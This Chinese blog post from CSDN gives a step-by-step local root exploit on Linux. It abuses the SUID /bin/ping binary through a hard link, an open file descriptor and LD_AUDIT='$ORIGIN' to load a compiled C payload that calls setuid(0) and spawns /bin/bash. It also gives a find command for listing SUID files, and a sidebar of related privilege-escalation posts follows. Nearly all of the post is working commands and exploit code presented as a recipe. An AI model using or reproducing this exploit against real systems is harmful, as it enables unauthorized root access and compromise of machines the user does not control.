ping命令suid提权

最新推荐文章于 2023-02-28 20:44:12 发布
最新推荐文章于 2023-02-28 20:44:12 发布
阅读量3.7k 收藏 3
点赞数 1
分类专栏: 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51524329/article/details/121962005
版权

linux 运维 服务器

查看tmp目录权限
ll -d /tmp

切换到tmp目录
cd /tmp

创建一个exploit目录
mkdir exploit

查看ping命令带suid权限
ll /bin/ping

创建target文件硬链接
ln /bin/ping /tmp/exploit/target

查看target文件权限
ll /tmp/exploit/target

把target文件加载到内存中
exec 3< /tmp/exploit/target

查看target在内存中的情况
"ll /proc/$$/fd/3"

删除target文件
rm -rf /tmp/exploit/

查看target在内存中的情况是删除状态
"ll /proc/$$/fd/3"

创建一个c语言代码
vim payload.c

void __attribute__((constructor)) init()  // 两个下划线
{
     setuid(0);
     system("/bin/bash");
}

利用gcc编译这段代码
gcc -W -fPIC -shared -o /tmp/exploit payload.c

提升到root权限
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

执行完,查看当前会话已经是root
whoami

附:通过以下的命令可以找到系统上所有的设置了suid的文件:
find / -perm -04000 -type f -ls

如果出现以下情况则说明不能提权 ![在这里插入图片描述](https://img-blog.csdnimg.cn/1a0180af26f0419cb12b238e5ba7aac5.png)
红云谈安全
关注
专栏目录
DC-2靶机(ssh远程SUID(VIM)提权
JyajT的博客
04-23 282
dc系列
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2547
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
linux 利用tmp提权
12-30 4909
以一个普通用户登录 [hello@localhost tmp]$ ls -ld /tmp/   因为tmp目录能写文件!! drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [hello@localhost tmp]$ cd /tmp/ [hello@localhost tmp]$ mkdir exploit [hello@localhost
命令执行nc的用法提权
04-20
这个文档是关于内核2.6.18-194.el5的提权,利用的是nc命令
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7369
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
LinuxSUID提权
Zlirving_的博客
08-25 827
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root   0x01 suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的:(三种都可以) find / -perm -u=s -type f 2>/
suid提权
m0_62207170的博客
02-28 345
suid提权
Linux Suid提权
YouthBelief的博客
12-21 722
Suid提权 原理 SUID(设置用户ID)是一种权限类型,它被赋予一个文件,允许用户以其所有者的权限执行该文件。Linux二进制文件可以拥有这种类型的权限集有很多原因。例如,ping实用程序需要root权限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 权限,则它们可用于将权限提升为 root。 suid权限 表示 chmod u+s 如下 二进制文件以 root 权限执行,因为它们的权限中包含“ s ”,并且它们归 roo
Linux与数据库提权
赤赤三的博客
03-20 669
Linux系统内核漏洞提权:(常见的就是系统内核提权 | 脏牛提权 | suid提权) 原理: linux内核版本的分类 Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字 第一个组数字:目前发布的内核主版本。 第二个组数字:偶数表示稳定版本;奇数表示开发中版本。 第三个组数字:错误修补的次数。 思路(利用linux系统漏洞进行提权,首先搜索linux系统漏洞,然后去github搜索Debian 5对应
Linux怎么对当前目录提权,linux提权方法(不断总结更新)
weixin_28331555的博客
04-29 774
1.suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;find / -user root -perm -4000 -print 2>/dev...
c语言提权,利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
weixin_35715366的博客
05-19 481
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限RHEL5-RHEL6下面都可以实现,root的UID是零创建一个普通用户useradd andy切换到andy用户su - andy查看当前用户是谁whoami查看tmp目录权限[andy@bogon tmp]$ ll -d /tmpdrwxrwxrwt. 15 root root 4096 6月 29 14:08 /...
Linux SUID 提权
柠檬木有枝
01-27 4852
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 权限位文件0x02 常用提权方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
linux suid提权原理,linux关于suid提权笔记
weixin_33631305的博客
05-13 248
suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执行文件设置了suid权限。设置了s位的程序在运行时,其Effective UID将会设置为这个程序的所有者。比如,/bin/ping这个程序的所有者是0(root),它设置了s位,那么普通用户在运行p...
普通用户提权
weixin_33920401的博客
11-22 166
说明:RHEL5—RHEL6下 都可以提权 1. ls -ld /tmp/ 2. ls -l /bin/ping 3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target 4. exec 3< /tmp/exploit/target ; rm -rf /tmp/exp...
suid
Unicorn
05-04 2987
SUID    
Linuxsuid提权
qq_41123867的博客
03-18 2233
一、原理: 设置了SUID的文件可以让调用者以文件属主的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了 SUID详解 二、已知可用来提权linux文件: nmap vim find bash more less nano cp 三、提权过程 1. 查看当前用户权限 在获得一个shell后,我们可以...
Linux记录用户执行命令
lumia98的博客
12-30 664
#!/bin/bash # By lumia98@vip.qq.com # 记录用户执行命令及IP地址 # 文件存放在 /etc/profile.d 或者/etc/profile # source /etc/profile 生效; # 登录提示权限不足可以忽略,因为这是禁止用户删除权限提示; # Linux系统记录每个用户执行的命令 # 创建目录 hislog_dir="/tmp/hislog" [ -d ${hislog_dir} ] || mkdir -p ${hislog_dir} # 第一次请先
Centos普通用户提权至ROOT
weixin_30919919的博客
12-25 1525
1、利用/bin/ping的漏洞普通用户提权。(rws中的s) [root@localhost ~]# ls -l /bin/ping -rwsr-xr-x. 1 root root 40760 9月 26 2013 /bin/ping 2、执行以下代码即可: #!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /t...
Mac系统ping不用提权的原因
aa642531的博客
12-31 1336
前几天在做udp嗅探的时候,发现一个问题,苹果系统的pingping6)是不用提权的,没有s位,引起了我的好奇,因为在我使用过的ubuntu系统或者是centos系统也好,这个ping都是带s位的。在解决主要问题的时候也顺便把这个问题给解决了。 会创建s权限,是为了让一般用户在执行某些程序的时候,能够暂时具有该程序拥有者的权限,ubuntu系统或者centos系统下ping程序为了接收ICMP...
curl 的suid 提权
最新发布
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值